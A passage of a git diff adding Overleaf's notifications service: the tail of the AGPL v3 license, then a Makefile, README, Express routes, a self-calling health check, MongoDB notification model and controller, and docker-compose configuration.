+ + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. 
If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 
+ + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/notifications/Makefile b/services/notifications/Makefile new file mode 100644 index 0000000..8ca3f98 --- /dev/null +++ b/services/notifications/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = notifications +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/notifications/README.md b/services/notifications/README.md new file mode 100644 index 0000000..da141ce --- /dev/null +++ b/services/notifications/README.md @@ -0,0 +1,20 @@ +overleaf/notifications +=============== + +An API for managing user notifications in Overleaf + + +database indexes +================ + +For notification expiry to work, a TTL index on `notifications.expires` must be created: + +```javascript +db.notifications.createIndex({expires: 1}, {expireAfterSeconds: 10}) +``` + +License +======= +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. + +Copyright (c) Overleaf, 2016–2019. 
diff --git a/services/notifications/app.js b/services/notifications/app.js
new file mode 100644
index 0000000..38292c7
--- /dev/null
+++ b/services/notifications/app.js
@@ -0,0 +1,65 @@
+// Metrics must be initialized before importing anything else
+require('@overleaf/metrics/initialize')
+
+const metrics = require('@overleaf/metrics')
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+logger.initialize('notifications')
+const express = require('express')
+const app = express()
+const methodOverride = require('method-override')
+const bodyParser = require('body-parser')
+const { mongoClient } = require('./app/js/mongodb')
+const controller = require('./app/js/NotificationsController')
+
+metrics.memory.monitor(logger)
+metrics.open_sockets.monitor()
+
+const HealthCheckController = require('./app/js/HealthCheckController')
+
+app.use(methodOverride())
+app.use(bodyParser())
+app.use(metrics.http.monitor(logger))
+
+metrics.injectMetricsRoute(app)
+
+app.post('/user/:user_id', controller.addNotification)
+app.get('/user/:user_id', controller.getUserNotifications)
+app.delete(
+  '/user/:user_id/notification/:notification_id',
+  controller.removeNotificationId
+)
+app.delete('/user/:user_id', controller.removeNotificationKey)
+app.delete('/key/:key', controller.removeNotificationByKeyOnly)
+app.get('/key/:key/count', controller.countNotificationsByKeyOnly)
+app.delete('/key/:key/bulk', controller.deleteUnreadNotificationsByKeyOnlyBulk)
+
+app.get('/status', (req, res) => res.send('notifications is up'))
+
+app.get('/health_check', (req, res) =>
+  HealthCheckController.check(function (err) {
+    if (err) {
+      logger.err({ err }, 'error performing health check')
+      res.sendStatus(500)
+    } else {
+      res.sendStatus(200)
+    }
+  })
+)
+
+app.get('*', (req, res) => res.sendStatus(404))
+
+const host = Settings.internal?.notifications?.host || '127.0.0.1'
+const port = Settings.internal?.notifications?.port || 3042
+
+mongoClient
  .connect()
+  .then(() => {
+    app.listen(port, host, () =>
+      logger.debug(`notifications starting up, listening on ${host}:${port}`)
+    )
+  })
+  .catch(err => {
+    logger.fatal({ err }, 'Cannot connect to mongo. Exiting.')
+    process.exit(1)
+  })
diff --git a/services/notifications/app/js/HealthCheckController.js b/services/notifications/app/js/HealthCheckController.js
new file mode 100644
index 0000000..b08be32
--- /dev/null
+++ b/services/notifications/app/js/HealthCheckController.js
@@ -0,0 +1,112 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
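+//
+// This module implements an end-to-end smoke test: it POSTs a throwaway
+// notification to the service's own HTTP API, GETs it back to verify that
+// it round-trips through Mongo, and then cleans up both the notification
+// and the underlying document.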
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const { db, ObjectId } = require('./mongodb')
+const request = require('request')
+const async = require('async')
+const settings = require('@overleaf/settings')
+const { port } = settings.internal.notifications
+const logger = require('@overleaf/logger')
+
+module.exports = {
+  check(callback) {
+    const userId = new ObjectId()
+    const cleanupNotifications = callback =>
+      db.notifications.deleteOne({ user_id: userId }, callback)
+
+    let notificationKey = `smoke-test-notification-${new ObjectId()}`
+    const getOpts = endPath => ({
+      url: `http://127.0.0.1:${port}/user/${userId}${endPath}`,
+      timeout: 5000,
+    })
+    logger.debug(
+      { userId, opts: getOpts(''), key: notificationKey },
+      'Health Check: running'
+    )
+    const jobs = [
+      function (cb) {
+        const opts = getOpts('/')
+        opts.json = {
+          key: notificationKey,
+          messageOpts: '',
+          templateKey: 'f4g5',
+          user_id: userId,
+        }
+        return request.post(opts, cb)
+      },
+      function (cb) {
+        const opts = getOpts('/')
+        opts.json = true
+        return request.get(opts, function (err, res, body) {
+          if (err != null) {
+            logger.err({ err }, 'Health Check: error getting notification')
+            // fail this step so the series callback can run cleanup
+            return cb(err)
+          } else if (res.statusCode !== 200) {
+            const e = `status code not 200 ${res.statusCode}`
+            logger.err({ err }, e)
+            return cb(e)
+          }
+          const hasNotification = body.some(
+            notification =>
+              notification.key === notificationKey &&
+              notification.user_id === userId.toString()
+          )
+          if (hasNotification) {
+            return cb(null, body)
+          } else {
+            logger.err(
+              { body, notificationKey },
+              'Health Check: notification not in response'
+            )
+            return cb(new Error('notification not found in response'))
+          }
+        })
+      },
+    ]
+    return async.series(jobs, function (err, body) {
+      if (err != null) {
+        logger.err({ err }, 'Health Check: error running health check')
+        return cleanupNotifications(() => callback(err))
+      } else {
+        const notificationId = body[1][0]._id
+        notificationKey = body[1][0].key
+        let opts = getOpts(`/notification/${notificationId}`)
+        logger.debug(
+          { notificationId, notificationKey },
+          'Health Check: doing cleanup'
+        )
+        return request.del(opts, function (err, res, body) {
+          if (err != null) {
+            logger.err(
+              err,
+              opts,
+              'Health Check: error cleaning up notification'
+            )
+            return callback(err)
+          }
+          opts = getOpts('')
+          opts.json = { key: notificationKey }
+          return request.del(opts, function (err, res, body) {
+            if (err != null) {
+              logger.err(
+                err,
+                opts,
+                'Health Check: error cleaning up notification'
+              )
+              return callback(err)
+            }
+            return cleanupNotifications(callback)
+          })
+        })
+      }
+    })
+  },
+}
diff --git a/services/notifications/app/js/Notifications.js b/services/notifications/app/js/Notifications.js
new file mode 100644
index 0000000..9c4df59
--- /dev/null
+++ b/services/notifications/app/js/Notifications.js
@@ -0,0 +1,132 @@
+/* eslint-disable
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
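+//
+// Data model note: a notification counts as "unread" while its document
+// still carries a `templateKey`; the remove* methods below mark a
+// notification as read by unsetting that field, while the delete* methods
+// remove the document itself.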
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const logger = require('@overleaf/logger')
+const { db, ObjectId } = require('./mongodb')
+
+module.exports = {
+  getUserNotifications(userId, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    const query = {
+      user_id: new ObjectId(userId),
+      templateKey: { $exists: true },
+    }
+    db.notifications.find(query).toArray(callback)
+  },

+  _countExistingNotifications(userId, notification, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    const query = {
+      user_id: new ObjectId(userId),
+      key: notification.key,
+    }
+    return db.notifications.count(query, function (err, count) {
+      if (err != null) {
+        return callback(err)
+      }
+      return callback(null, count)
+    })
+  },
+
+  addNotification(userId, notification, callback) {
+    return this._countExistingNotifications(
+      userId,
+      notification,
+      function (err, count) {
+        if (err != null) {
+          return callback(err)
+        }
+        if (count !== 0 && !notification.forceCreate) {
+          return callback()
+        }
+        const doc = {
+          user_id: new ObjectId(userId),
+          key: notification.key,
+          messageOpts: notification.messageOpts,
+          templateKey: notification.templateKey,
+        }
+        // The optional `expires` field should arrive as an ISO date-string
+        // corresponding to a datetime in the future at which the document
+        // should be removed automatically. In Mongo, TTL indexes only work on
+        // date fields and ignore documents where that field is missing; see
+        // `README.md` for instructions on creating the TTL index.
+        if (notification.expires != null) {
+          try {
+            doc.expires = new Date(notification.expires)
+            // toISOString() throws a RangeError on an invalid date
+            const _testValue = doc.expires.toISOString()
+          } catch (error) {
+            err = error
+            logger.error(
+              { userId, expires: notification.expires },
+              'error converting `expires` field to Date'
+            )
+            return callback(err)
+          }
+        }
+        db.notifications.updateOne(
+          { user_id: doc.user_id, key: notification.key },
+          { $set: doc },
+          { upsert: true },
+          callback
+        )
+      }
+    )
+  },
+
+  removeNotificationId(userId, notificationId, callback) {
+    const searchOps = {
+      user_id: new ObjectId(userId),
+      _id: new ObjectId(notificationId),
+    }
+    const updateOperation = { $unset: { templateKey: true, messageOpts: true } }
+    db.notifications.updateOne(searchOps, updateOperation, callback)
+  },
+
+  removeNotificationKey(userId, notificationKey, callback) {
+    const searchOps = {
+      user_id: new ObjectId(userId),
+      key: notificationKey,
+    }
+    const updateOperation = { $unset: { templateKey: true } }
+    db.notifications.updateOne(searchOps, updateOperation, callback)
+  },
+
+  removeNotificationByKeyOnly(notificationKey, callback) {
+    const searchOps = { key: notificationKey }
+    const updateOperation = { $unset: { templateKey: true } }
+    db.notifications.updateOne(searchOps, updateOperation, callback)
+  },
+
+  countNotificationsByKeyOnly(notificationKey, callback) {
+    const searchOps = { key: notificationKey, templateKey: { $exists: true } }
+    db.notifications.count(searchOps, callback)
+  },
+
+  deleteUnreadNotificationsByKeyOnlyBulk(notificationKey, callback) {
+    if (typeof notificationKey !== 'string') {
+      throw new Error('refusing to bulk delete arbitrary notifications')
+    }
+    const searchOps = { key: notificationKey, templateKey: { $exists: true } }
+    db.notifications.deleteMany(searchOps, (err, result) => {
+      // forward errors; otherwise report how many documents were removed
+
if (err) return callback(err) + callback(null, result.deletedCount) + }) + }, + + // hard delete of doc, rather than removing the templateKey + deleteNotificationByKeyOnly(notificationKey, callback) { + const searchOps = { key: notificationKey } + db.notifications.deleteOne(searchOps, callback) + }, +} diff --git a/services/notifications/app/js/NotificationsController.js b/services/notifications/app/js/NotificationsController.js new file mode 100644 index 0000000..89b7fa9 --- /dev/null +++ b/services/notifications/app/js/NotificationsController.js @@ -0,0 +1,117 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Notifications = require('./Notifications') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') + +module.exports = { + getUserNotifications(req, res, next) { + logger.debug( + { userId: req.params.user_id }, + 'getting user unread notifications' + ) + metrics.inc('getUserNotifications') + return Notifications.getUserNotifications( + req.params.user_id, + (err, notifications) => { + if (err) return next(err) + res.json(notifications) + } + ) + }, + + addNotification(req, res) { + logger.debug( + { userId: req.params.user_id, notification: req.body }, + 'adding notification' + ) + metrics.inc('addNotification') + return Notifications.addNotification( + req.params.user_id, + req.body, + function (err, notifications) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + } + ) + }, + + removeNotificationId(req, res, next) { + logger.debug( + { + userId: req.params.user_id, + notificationId: req.params.notification_id, + }, + 'mark id notification as read' + ) + metrics.inc('removeNotificationId') + return Notifications.removeNotificationId( + req.params.user_id, + req.params.notification_id, + err => { + if (err) return next(err) + res.sendStatus(200) + } + ) + }, + + removeNotificationKey(req, res, next) { + logger.debug( + { userId: req.params.user_id, notificationKey: req.body.key }, + 'mark key notification as read' + ) + metrics.inc('removeNotificationKey') + return Notifications.removeNotificationKey( + req.params.user_id, + req.body.key, + (err, notifications) => { + if (err) return next(err) + res.sendStatus(200) + } + ) + }, + + removeNotificationByKeyOnly(req, res, next) { + const notificationKey = req.params.key + logger.debug({ notificationKey }, 'mark notification as read by key only') + metrics.inc('removeNotificationKey') + return Notifications.removeNotificationByKeyOnly(notificationKey, err => { + if (err) return next(err) + res.sendStatus(200) + }) + }, + + countNotificationsByKeyOnly(req, res) { + const notificationKey = req.params.key + Notifications.countNotificationsByKeyOnly(notificationKey, (err, count) => { + if (err) { + logger.err({ err, notificationKey }, 'cannot count by key') + return res.sendStatus(500) + } + res.json({ count }) + }) + }, + + deleteUnreadNotificationsByKeyOnlyBulk(req, res) { + const notificationKey = req.params.key + Notifications.deleteUnreadNotificationsByKeyOnlyBulk( + notificationKey, + (err, count) => { + if (err) { + logger.err({ err, notificationKey }, 'cannot bulk remove by key') + return res.sendStatus(500) + } + res.json({ count }) + } + ) 
+ }, +} diff --git a/services/notifications/app/js/mongodb.js b/services/notifications/app/js/mongodb.js new file mode 100644 index 0000000..764998f --- /dev/null +++ b/services/notifications/app/js/mongodb.js @@ -0,0 +1,18 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + notifications: mongoDb.collection('notifications'), +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + mongoClient, + ObjectId, +} diff --git a/services/notifications/buildscript.txt b/services/notifications/buildscript.txt new file mode 100644 index 0000000..c52e316 --- /dev/null +++ b/services/notifications/buildscript.txt @@ -0,0 +1,9 @@ +notifications +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/notifications/config/settings.defaults.js b/services/notifications/config/settings.defaults.js new file mode 100644 index 0000000..3453b88 --- /dev/null +++ b/services/notifications/config/settings.defaults.js @@ -0,0 +1,17 @@ +module.exports = { + internal: { + notifications: { + port: 3042, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/notifications/docker-compose.ci.yml b/services/notifications/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/notifications/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/notifications/docker-compose.yml b/services/notifications/docker-compose.yml new file mode 100644 index 0000000..c0902fe --- /dev/null +++ b/services/notifications/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. 
